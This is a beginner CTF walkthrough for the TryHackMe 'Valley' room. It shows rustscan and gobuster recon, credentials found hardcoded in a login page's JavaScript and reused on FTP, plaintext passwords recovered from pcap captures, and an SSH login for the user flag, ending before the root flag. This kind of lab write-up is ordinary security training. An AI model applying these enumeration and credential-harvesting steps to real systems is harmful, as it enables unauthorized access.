Walkthrough: Valley CTF - TryHackMe.
Beginner level ctf.
Can you find your way into the Valley?
Answer the questions below
- What is the user flag?
- What is the root flag?
Since we don’t care being noticed, we can run rustscan, which is faster than nmap.
┌──(kali㉿kali)-[~/Documents]
└─$rustscan -a 10.10.91.79
Results:
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 80/tcp open http syn-ack 37370/tcp open unknown syn-ack
Port 22 doesn’t allow anon login, so we move forward.
We access the site via web browser.
index.html
pricing.html
gallery.html
Not much to see in the source code. Also nothing relevant in styles.css
We run gobuster on port 80 in case we miss anything:
┌──(kali㉿kali)-[~/Documents]
└─$gobuster dir --url http://10.10.91.79:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Results: /gallery (Status: 301) [Size: 312] [–> http://10.10.91.79/gallery/] /static (Status: 301) [Size: 311] [–> http://10.10.91.79/static/] /pricing (Status: 301) [Size: 312] [–> http://10.10.91.79/pricing/]
/static –> we can’t see any file there.
/pricing –> a note.txt file and the html file.
note.txt J, Please stop leaving notes randomly on the website -RP
/gallery –> just the html file.
We dig deeper in the found directories.
┌──(kali㉿kali)-[~/Documents]
└─$gobuster dir --url http://10.10.91.79:80/static -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Results:
Starting gobuster in directory enumeration mode /11 (Status: 200) [Size: 627909] /12 (Status: 200) [Size: 2203486] /3 (Status: 200) [Size: 421858] /10 (Status: 200) [Size: 2275927] /13 (Status: 200) [Size: 3673497] /16 (Status: 200) [Size: 2468462] /6 (Status: 200) [Size: 2115495] /18 (Status: 200) [Size: 2036137] /1 (Status: 200) [Size: 2473315] /9 (Status: 200) [Size: 1190575] /5 (Status: 200) [Size: 1426557] /14 (Status: 200) [Size: 3838999] /17 (Status: 200) [Size: 3551807] /7 (Status: 200) [Size: 5217844] /8 (Status: 200) [Size: 7919631] /15 (Status: 200) [Size: 3477315] /00 (Status: 200) [Size: 127]
/00 seems to be an outlier. In there we found some notes:
dev notes from valleyDev: -add wedding photo examples -redo the editing on #4 -remove /dev1243224123123 -check for SIEM alerts
We check if /dev1243224123123 is still up.
It is. There’s a login page. In the source code we find 2 .js files. One of them includes:
loginButton.addEventListener("click", (e) => {
e.preventDefault();
const username = loginForm.username.value;
const password = loginForm.password.value;
if (username === "siemDev" && password === "california") {
window.location.href = "/dev1243224123123/devNotes37370.txt";
} else {
loginErrorMsg.style.opacity = 1;
}
})
Going to /dev1243224123123/devNotes37370.txt we get more notes:
dev notes for ftp server -stop reusing credentials -check for any vulnerabilies -stay up to date on patching -change ftp port to normal port
Since it mentioned the port, we check that weird tcp port we found with rustscan. We check if dev is reusing credentials. It is, we can log in.
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.91.79 -P 37370
There we found some pcapng files.
Results -rw-rw-r– 1 1000 1000 7272 Mar 06 2023 siemFTP.pcapng -rw-rw-r– 1 1000 1000 1978716 Mar 06 2023 siemHTTP1.pcapng -rw-rw-r– 1 1000 1000 1972448 Mar 06 2023 siemHTTP2.pcapng
We open them with Wireshark:
In siemFTP.pcanpng we found the existencie of some files which may or may not be relevant: Line-based text data (6 lines)
siemFTP.pcanpng -rw-r–r– 1 0 0 0 Mar 06 13:27 AnnualReport.txt\r\n -rw-r–r– 1 0 0 0 Mar 06 13:27 BusinessReport.t -rw-r–r– 1 0 0 0 Mar 06 13:27 CISOReport.txt\r\n -rw-r–r– 1 0 0 0 Mar 06 13:27 HrReport.txt\r\n -rw-r–r– 1 0 0 0 Mar 06 13:27 ItReport.txt\r\n -rw-r–r– 1 0 0 0 Mar 06 13:27 SecurityReport.txt\r\n
In siemHTTP.pcanpg we found nothing. Everything’s encrypted.
In siemHTTP2.pcanpg we found a package with the following information:
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "uname" = "valleyDev"
Form item: "psw" = "ph0t0s1234"
Form item: "remember" = "on"
We can use that to access via ssh:
┌──(kali㉿kali)
└─$ ssh valleyDev@10.10.91.79
As soon as we access there is a user.txt file containing the first flag.
Next flag to be continued…